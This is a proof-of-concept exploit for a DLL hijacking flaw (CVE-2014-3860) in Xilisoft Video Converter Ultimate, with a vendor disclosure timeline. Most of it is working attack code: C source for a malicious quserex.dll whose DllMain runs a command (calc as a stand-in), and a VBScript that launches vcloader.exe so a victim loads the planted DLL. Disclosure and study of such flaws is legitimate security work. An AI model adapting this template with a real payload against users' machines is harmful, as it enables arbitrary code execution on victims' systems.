/* * Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll) * Version: 7.8.1 build-20140505 (Previous versions might be vulnerable) * Tested on: Windows XP SP2 en * Vendor: http://www.xilisoft.com/ * Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7 * Exploit-Author: Osanda Malith Jayathissa * /!\ Author is not responsible for any damage you cause * Use this material for educational purposes only * Twitter: @OsandaMalith * CVE: CVE-2014-3860 */ /* Vulnerable Executables: 1. vcloader.exe 2. vc.exe 3. vc_buy.exe */ #include int pwned() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { pwned(); return 0; } /* As this application as no extensions associated we have to manually a open a file with this application. So we can automate this process by writting something like this ;) Place the DLL and this script in the same location. Once the victim runs this script the DLL will be hijacked. msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit") Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true) objFileToWrite.WriteLine("POC by Osanda Malith :D") objFileToWrite.Close file = "new.jpg" Set oShell = CreateObject("WScript.Shell") ' Path to Xilisoft Video Converter oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file */ /* Disclosure Timeline 2014-04-20 : Contacted the vendor 2014-04-23 : Contacted again as I did not recieve any reply 2014-04-24 : Recieved a response saying that it was forwarded to technicians 2014-05-16 : Contacted again since there is was reply 2014-05-20 : Recieved a response saying that they cannot reproduce 2014-06-01 : Contacted MITRE 2014-06-02 : Public disclosure */ //EOF